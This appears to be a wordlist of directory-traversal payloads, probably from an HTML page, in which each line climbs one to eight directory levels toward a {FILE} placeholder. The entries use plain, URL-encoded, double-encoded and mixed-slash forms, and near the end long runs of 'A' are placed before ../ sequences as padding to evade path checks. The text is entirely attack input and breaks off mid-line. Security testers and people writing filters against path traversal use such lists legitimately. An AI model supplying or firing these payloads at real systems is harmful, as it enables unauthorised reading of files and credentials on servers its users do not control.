%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
\../{FILE}&lt;br /&gt;
\../\../{FILE}&lt;br /&gt;
\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
/..\{FILE}&lt;br /&gt;
/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA